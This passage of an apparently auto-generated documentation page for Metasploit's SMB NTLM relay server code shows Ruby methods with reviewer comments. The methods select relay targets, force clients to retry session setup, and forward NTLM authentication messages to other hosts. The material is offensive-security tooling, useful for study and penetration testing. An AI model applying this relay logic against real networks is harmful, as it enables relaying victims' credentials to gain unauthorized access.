<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_signing_required'>signing_required</span> <span class='op'>=</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_security_mode'>security_mode</span><span class='period'>.</span><span class='id identifier rubyid_signing_required'>signing_required</span> <span class='op'>==</span> <span class='int'>1</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span> <span class='op'>&amp;&amp;</span> <span class='ivar'>@dialect</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0x0311</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_update_preauth_hash'>update_preauth_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_response'>response</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<!--
  do_tree_connect_smb2(request, session): SMB2 tree connect handler of the relay server.
  Reading of the Ruby listing below:
  - Logs the identity held in session.metadata[:identity], asks
    @relay_targets.next(identity) for a target and stores the answer in
    session.metadata[:relay_target].
  - When no target is returned (nil), logs "All targets relayed to" and hands the
    request to the superclass implementation with super(request, session).
  - Otherwise calls prepare_relay(session) and returns a new
    RubySMB::SMB2::Packet::TreeConnectResponse whose nt_status is
    FORCE_RETRY_SESSION_SETUP.value. The request argument is not read on this path.
  NOTE(review): seen from the client, this path answers a tree connect with a status
  instead of a share. What the client does next depends on FORCE_RETRY_SESSION_SETUP,
  whose value is not shown in this listing; the name suggests it is chosen so the
  client authenticates again. Confirm against the constant's definition.
  NOTE(review): the identity is interpolated into both log lines as is. Presumably it is
  derived from the peer's authentication message, so treat those log lines as
  peer-supplied text wherever they are parsed or displayed. TODO confirm where
  :identity is set.
-->
<h3 class="signature " id="do_tree_connect_smb2-instance_method">
#<strong>do_tree_connect_smb2</strong>(request, session) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 44</span>
<span class='kw'>def</span> <span class='id identifier rubyid_do_tree_connect_smb2'>do_tree_connect_smb2</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='comma'>,</span> <span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Received request for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='comment'># Attempt to select the next target to relay to
</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_next'>next</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='comment'># If there&#39;s no more targets to relay to, just tree connect to the currently running server instead
</span> <span class='kw'>if</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - All targets relayed to</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='comma'>,</span> <span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_prepare_relay'>prepare_relay</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>SMB2</span><span class='op'>::</span><span class='const'>Packet</span><span class='op'>::</span><span class='const'>TreeConnectResponse</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="#FORCE_RETRY_SESSION_SETUP-constant" title="Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient::FORCE_RETRY_SESSION_SETUP (constant)">FORCE_RETRY_SESSION_SETUP</a></span></span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='id identifier rubyid_response'>response</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<!--
  handle_smb1(raw_request, header): SMB1 entry point of the relay server.
  In the Ruby listing below the method never builds a reply. It unpacks the peer socket
  address with ::Socket::unpack_sockaddr_in(getpeername), prints a warning that names the
  peer IP and the SMB1 command (looked up from header.command) together with a link to
  metasploit-framework issue 16261, and then raises NotImplementedError.
  raw_request is not read.
  NOTE(review): the rendered "Returns" tag lists RubySMB::GenericPacket, but no return
  path is visible in this body. The "Raises" tag is the one that matches the visible
  behaviour, so callers should expect the exception on every SMB1 message.
-->
<h3 class="signature " id="handle_smb1-instance_method">
#<strong>handle_smb1</strong>(raw_request, header) &#x21d2; <tt>RubySMB::GenericPacket</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Handle an SMB version 1 message.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>raw_request</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The bytes of the entire SMB request.</p>
</div>
</li>
<li>
<span class='name'>header</span>
<span class='type'>(<tt>RubySMB::SMB1::SMBHeader</tt>)</span>
&mdash;
<div class='inline'>
<p>The request header.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>RubySMB::GenericPacket</tt>)</span>
</li>
</ul>
<p class="tag_title">Raises:</p>
<ul class="raise">
<li>
<span class='type'>(<tt>NotImplementedError</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
67
68
69
70
71</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 67</span>
<span class='kw'>def</span> <span class='id identifier rubyid_handle_smb1'>handle_smb1</span><span class='lparen'>(</span><span class='id identifier rubyid_raw_request'>raw_request</span><span class='comma'>,</span> <span class='id identifier rubyid_header'>header</span><span class='rparen'>)</span>
<span class='id identifier rubyid__port'>_port</span><span class='comma'>,</span> <span class='id identifier rubyid_ip_address'>ip_address</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>Socket</span><span class='op'>::</span><span class='id identifier rubyid_unpack_sockaddr_in'>unpack_sockaddr_in</span><span class='lparen'>(</span><span class='id identifier rubyid_getpeername'>getpeername</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Cannot relay request from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ip_address'>ip_address</span><span class='embexpr_end'>}</span><span class='tstring_content'>. The SMB1 </span><span class='embexpr_beg'>#{</span><span class='op'>::</span><span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>SMB1</span><span class='op'>::</span><span class='const'>Commands</span><span class='period'>.</span><span class='id identifier rubyid_name'>name</span><span class='lparen'>(</span><span class='id identifier rubyid_header'>header</span><span class='period'>.</span><span class='id identifier rubyid_command'>command</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'> command is not supported - https://github.com/rapid7/metasploit-framework/issues/16261</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>NotImplementedError</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<!--
  prepare_relay(session): opens the outbound connection for the target already stored in
  session.metadata[:relay_target] and records the outcome on the session.
  Reading of the Ruby listing below:
  - Logs the target, and prints a warning when the target protocol is :smb and its ip
    equals peerhost, that is, when the target is the same host as the connecting peer.
    The warning text states that this case fails on hosts patched for MS08-068.
  - Calls create_relay_client(target, @relay_timeout). A nil result is reported through
    @relay_targets.on_relay_end with is_success: false and sets
    session.metadata[:relay_mode] to false; any other result sets it to true.
  - In both cases stores the result, which may be nil, in
    session.metadata[:relayed_connection] and sets session.state to :in_progress.
  NOTE(review): because :relayed_connection can be nil after this method, code that
  reads it later should check :relay_mode first. Those readers are outside this
  method, so verify there.
-->
<h3 class="signature " id="prepare_relay-instance_method">
#<strong>prepare_relay</strong>(session) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 21</span>
<span class='kw'>def</span> <span class='id identifier rubyid_prepare_relay'>prepare_relay</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Relaying to next target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_protocol'>protocol</span> <span class='op'>==</span> <span class='symbol'>:smb</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span> <span class='op'>==</span> <span class='id identifier rubyid_peerhost'>peerhost</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Relaying SMB to SMB on the same host will not work if the target has been patched for MS08-068</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relayed_connection'>relayed_connection</span> <span class='op'>=</span> <span class='id identifier rubyid_create_relay_client'>create_relay_client</span><span class='lparen'>(</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='ivar'>@relay_timeout</span>
<span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_on_relay_end'>on_relay_end</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='label'>identity:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='label'>is_success:</span> <span class='kw'>false</span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_mode</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>false</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_mode</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relayed_connection</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_state'>state</span> <span class='op'>=</span> <span class='symbol'>:in_progress</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<!--
  process_gss_spnego_init(incoming_security_buffer): unwraps the NTLM blob carried in a
  SPNEGO NegTokenInit.
  The Ruby listing below parses the buffer with
  Rex::Proto::Gss::SpnegoNegTokenInit.parse, takes mech_token, passes it to
  validate_ntlm_blob! and returns it. A RASN1::ASN1Error is re-raised as ArgumentError
  with the prefix "Failed to parse NTLMSSP Type1 message from GSS".
  relay_ntlmssp, the caller shown on this page, rescues ArgumentError and
  OpenSSL::ASN1::ASN1Error only, so this conversion is what lets it log a malformed
  token and return instead of letting a RASN1 error propagate.
  NOTE(review): the sibling process_gss_spnego_targ also rescues ArgumentError; this
  method does not. Presumably validate_ntlm_blob! raises ArgumentError on a bad blob.
  If so, that error leaves this method with its own message rather than the Type1
  prefix. Confirm against validate_ntlm_blob!, which is not shown here.
-->
<h3 class="signature " id="process_gss_spnego_init-instance_method">
#<strong>process_gss_spnego_init</strong>(incoming_security_buffer) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
152
153
154
155
156
157
158
159
160
161</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 152</span>
<span class='kw'>def</span> <span class='id identifier rubyid_process_gss_spnego_init'>process_gss_spnego_init</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_gss_init'>gss_init</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Gss.html" title="Rex::Proto::Gss (module)">Gss</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Gss/SpnegoNegTokenInit.html" title="Rex::Proto::Gss::SpnegoNegTokenInit (class)">SpnegoNegTokenInit</a></span></span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span> <span class='op'>=</span> <span class='id identifier rubyid_gss_init'>gss_init</span><span class='period'>.</span><span class='id identifier rubyid_mech_token'>mech_token</span>
<span class='id identifier rubyid_validate_ntlm_blob!'>validate_ntlm_blob!</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span>
<span class='kw'>rescue</span> <span class='const'>RASN1</span><span class='op'>::</span><span class='const'>ASN1Error</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to parse NTLMSSP Type1 message from GSS: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<!--
  process_gss_spnego_targ(incoming_security_buffer): unwraps the NTLM blob carried in a
  SPNEGO NegTokenTarg.
  The Ruby listing below parses the buffer with
  Rex::Proto::Gss::SpnegoNegTokenTarg.parse, takes response_token, passes it to
  validate_ntlm_blob! and returns it. Both RASN1::ASN1Error and ArgumentError are
  rescued and re-raised as ArgumentError with the prefix
  "Failed to parse NTLMSSP Type3 message from GSS".
  relay_ntlmssp, the caller shown on this page, rescues ArgumentError and
  OpenSSL::ASN1::ASN1Error only, so converting RASN1::ASN1Error here is what lets it
  log a malformed token and return.
  NOTE(review): response_token is handed to validate_ntlm_blob! without a nil check in
  this listing. Whether a token with no response_token ends as ArgumentError depends
  on validate_ntlm_blob!, which is not shown here. TODO confirm.
-->
<h3 class="signature " id="process_gss_spnego_targ-instance_method">
#<strong>process_gss_spnego_targ</strong>(incoming_security_buffer) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
163
164
165
166
167
168
169
170
171
172</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 163</span>
<span class='kw'>def</span> <span class='id identifier rubyid_process_gss_spnego_targ'>process_gss_spnego_targ</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_gss_targ'>gss_targ</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Gss.html" title="Rex::Proto::Gss (module)">Gss</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Gss/SpnegoNegTokenTarg.html" title="Rex::Proto::Gss::SpnegoNegTokenTarg (class)">SpnegoNegTokenTarg</a></span></span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span> <span class='op'>=</span> <span class='id identifier rubyid_gss_targ'>gss_targ</span><span class='period'>.</span><span class='id identifier rubyid_response_token'>response_token</span>
<span class='id identifier rubyid_validate_ntlm_blob!'>validate_ntlm_blob!</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span>
<span class='kw'>rescue</span> <span class='const'>RASN1</span><span class='op'>::</span><span class='const'>ASN1Error</span><span class='comma'>,</span> <span class='const'>ArgumentError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to parse NTLMSSP Type3 message from GSS: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="relay_ntlmssp-instance_method">
#<strong>relay_ntlmssp</strong>(session, incoming_security_buffer = nil) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 174</span>
<span class='kw'>def</span> <span class='id identifier rubyid_relay_ntlmssp'>relay_ntlmssp</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='comma'>,</span> <span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='comment'># TODO: Add support for a default NTLM provider in ruby_smb
</span> <span class='kw'>begin</span>
<span class='id identifier rubyid_buf'>buf</span> <span class='op'>=</span> <span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_b'>b</span>
<span class='kw'>if</span> <span class='id identifier rubyid_valid_ntlm_blob?'>valid_ntlm_blob?</span><span class='lparen'>(</span><span class='id identifier rubyid_buf'>buf</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_message'>ntlm_message</span> <span class='op'>=</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_buf'>buf</span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:ntlm_wrapper</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='symbol'>:none</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_gss_api'>gss_api</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>ASN1</span><span class='period'>.</span><span class='id identifier rubyid_decode'>decode</span><span class='lparen'>(</span><span class='id identifier rubyid_buf'>buf</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag'>tag</span> <span class='op'>==</span> <span class='int'>0</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag_class'>tag_class</span> <span class='op'>==</span> <span class='symbol'>:APPLICATION</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_process_gss_spnego_init'>process_gss_spnego_init</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_message'>ntlm_message</span> <span class='op'>=</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag'>tag</span> <span class='op'>==</span> <span class='int'>1</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag_class'>tag_class</span> <span class='op'>==</span> <span class='symbol'>:CONTEXT_SPECIFIC</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_process_gss_spnego_targ'>process_gss_spnego_targ</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_message'>ntlm_message</span> <span class='op'>=</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:ntlm_wrapper</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='symbol'>:gss_spnego</span>
<span class='kw'>end</span>
<span class='kw'>rescue</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>ASN1</span><span class='op'>::</span><span class='const'>ASN1Error</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to parse incoming NTLM message: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span>
<span class='kw'>end</span>
<span class='comment'># NTLM negotiation request
</span> <span class='comment'># Choose the next machine to relay to, and send the incoming security buffer to the relay target
</span> <span class='kw'>if</span> <span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='op'>::</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='op'>::</span><span class='const'>Type1</span><span class='rparen'>)</span>
<span class='id identifier rubyid_relayed_connection'>relayed_connection</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relayed_connection</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_info'>info</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Relaying NTLM type 1 message to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='tstring_end'>&quot;</span></span>\
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>(Always Sign: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_has_flag?'>has_flag?</span><span class='lparen'>(</span><span class='symbol'>:ALWAYS_SIGN</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>, </span><span class='tstring_end'>&quot;</span></span>\
